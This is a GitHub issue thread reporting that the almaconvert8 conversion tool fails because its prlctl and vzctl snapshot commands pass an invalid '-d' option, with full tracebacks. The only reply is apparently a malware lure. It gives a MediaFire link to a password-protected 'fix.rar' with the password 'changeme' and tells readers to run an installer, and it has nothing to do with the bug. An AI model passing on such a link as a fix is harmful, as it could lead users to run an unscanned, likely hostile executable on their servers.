### ISSUE TITLE
invalid option -- 'd'

### ISSUE THREAD

**Issue by jpswade** [vzlinux/vzdeploy#3]
Off the back of #2 and https://github.com/cpanel/elevate/issues/286.

```
123: invalid option -- 'd'
Traceback (most recent call last):
  File "/usr/bin/almaconvert8", line 488, in process_single_ct
    snaphost_out = subprocess.check_output(['/bin/prlctl', 'snapshot', ct, '-n', 'Pre-Almalinux8', '-d', 'Created automatically by almaconvert8 tool at %s' % now])
  File "/usr/lib64/python3.6/subprocess.py", line 356, in check_output
    **kwargs).stdout
  File "/usr/lib64/python3.6/subprocess.py", line 438, in run
    output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '['/bin/prlctl', 'snapshot', '123', '-n', 'Pre-Almalinux8', '-d', 'Created automatically by almaconvert8 tool at 2024-...']' returned non-zero exit status 255.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/bin/almaconvert8", line 791, in <module>
    args.func()
  File "/usr/bin/almaconvert8", line 289, in process_cts
    results = pool.map(process_single_ct, args.CT)
  File "/usr/lib64/python3.6/multiprocessing/pool.py", line 266, in map
    return self._map_async(func, iterable, mapstar, chunksize).get()
  File "/usr/lib64/python3.6/multiprocessing/pool.py", line 644, in get
    raise self._value
  File "/usr/lib64/python3.6/multiprocessing/pool.py", line 119, in worker
    result = (True, func(*args, **kwds))
  File "/usr/lib64/python3.6/multiprocessing/pool.py", line 44, in mapstar
    return list(map(*args))
  File "/usr/bin/almaconvert8", line 491, in process_single_ct
    snaphost_out = subprocess.check_output(['/sbin/vzctl', 'snapshot', ct, '--name', 'Pre-Almalinux8', '-d', 'Created automatically by almaconvert8 tool at %s' % now])
  File "/usr/lib64/python3.6/subprocess.py", line 356, in check_output
    **kwargs).stdout
  File "/usr/lib64/python3.6/subprocess.py", line 438, in run
    output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '['/sbin/vzctl', 'snapshot', '123', '--name', 'Pre-Almalinux8', '-d', 'Created automatically by almaconvert8 tool at 2024-...']' returned non-zero exit status 21.

```

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
